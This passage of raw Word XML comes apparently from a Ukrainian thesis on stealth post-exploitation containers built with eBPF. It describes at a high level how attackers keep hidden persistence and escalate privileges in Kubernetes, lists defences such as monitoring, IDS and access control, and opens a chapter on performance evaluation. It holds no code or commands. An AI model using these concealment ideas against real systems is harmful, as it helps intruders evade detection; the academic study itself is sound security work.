          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Adv</w:t>
      </w:r>
      <w:r w:rsidR="00A93F26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anced Persistent Threats (APT)</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, де зловмисники не лише здобувають контроль над системою, а й прагнуть тривалого прихованого доступу до важливих даних чи інфраструктури. Зловмисники можуть використовувати стелс-контейнери для збереження постійного доступу до інфраструктури, маніпулюючи даними, отримуючи розвідувальну інформацію або підготовлюючи додаткові етапи атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [19]</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="00BB02FF">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BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Крім того, стелс-контейнери можуть бути використані для ескалації привілеїв та доступу до контейнеризованих додатків або оркестраторів, таких як Kubernetes. В такому випадку контейнер може створювати нові контейнери або модифікувати існуючі, забезпечуючи тим самим подальше просування в системі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="0095301E" w:rsidP="00BB02FF">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95301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для виявлення та захисту від стелс-постексплуатаційних контейнерів важливо застосовувати багаторівневий підхід до безпеки</w:t>
      </w:r>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [20]</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00A93F26" w:rsidP="00BB02FF">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Моніторинг та аудит</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: Використання розширених інструментів моніторингу, які можуть відстежувати підозрілу активність контейнерів, таких як зміни в мережев</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>их маршрутах або нестандартні з’</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>єднання.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00A93F26" w:rsidP="00BB02FF">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 </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Си</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>стеми виявлення вторгнень (IDS)</w:t>
      </w:r>
      <w:r w:rsidR="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Встановлення систем IDS для виявлення аномальних або підозрілих дій, які можуть вказувати на компрометацію контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00A93F26" w:rsidP="00BB02FF">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Політики безпеки</w:t>
      </w:r>
      <w:r w:rsidR="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Впровадження політик безпеки на рівні контейнерів, що обмежують доступ до критичних ресурсів хоста та дозволяють лише необхідні операції.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00A93F26" w:rsidP="00BB02FF">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4E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контроль доступу.</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використання політик контролю доступу та аутентифікації для забезпечення того, щоб тільки авторизовані користувачі могли змінювати або взаємодіяти з контейнерами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006566A" w:rsidRDefault="00BB02FF" w:rsidP="00BB02FF">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BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Таким чином, побудова стелс-постексплуатаційного контейнера є складним процесом, що вимагає обережності та уважності до деталей. Він дозволяє зловмисникам залишатися непоміченими в системі протягом тривалого часу, що ставить серйозні виклики перед фахівцями з безпеки</w:t>
      </w:r>
      <w:r w:rsidR="0095301E" w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [20]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006566A" w:rsidRDefault="0006566A" w:rsidP="00AA5B2B">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06566A" w:rsidRDefault="0006566A" w:rsidP="00AA5B2B">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F14887" w:rsidRDefault="00F14887">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRPr="004E7209" w:rsidRDefault="004E7209" w:rsidP="004E7209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>РОЗДІЛ 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRPr="0095301E" w:rsidRDefault="004E7209" w:rsidP="004E7209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Оцінка продуктивності. Сценарії навантаження</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRPr="004E7209" w:rsidRDefault="004E7209" w:rsidP="004E7209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRPr="004E7209" w:rsidRDefault="004E7209" w:rsidP="004E7209">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.1. О</w:t>
      </w:r>
      <w:r w:rsidRPr="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">цінка продуктивності інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E7209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерній системі</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRDefault="004E7209">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="0022205F" w:rsidRDefault="0022205F" w:rsidP="0022205F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022205F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Розроблена технологія інтеграції </w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidR="0005354B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">(Додаток) </w:t>
      </w:r>
      <w:r w:rsidRPr="0022205F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>для побудови невидимих контейнерів у сучасних ІТ-системах відкриває нові можливості для моніторингу, безпеки та оптимізації, проте вона також вимагає ретельної оц</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інки впливу на продуктивність.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="0022205F" w:rsidRDefault="0022205F" w:rsidP="0022205F">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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Необхідно в</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рахову</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вати те</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> працює на рівні ядра </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">тому </w:t>
      </w:r>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">будь-які додаткові функції, які він надає, можуть мати вплив на ефективність роботи контейнерів та їх взаємодію з </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>хостом</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Оцінка продуктивності інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерну систему є критично важливою для забезпечення збалансованої роботи з урахуванням як безпеки, так і ефективності ресурсів</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [21]</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7209" w:rsidRPr="001C076D" w:rsidRDefault="00BC6B10" w:rsidP="0022205F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0022205F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Тому вкрай важливо ретельно розглядати</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [22]</w:t>
      </w:r>
      <w:r w:rsidR="0022205F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="00742B58" w:rsidRDefault="00F52DE5" w:rsidP="0022205F">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1. Навантаження на систему.</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
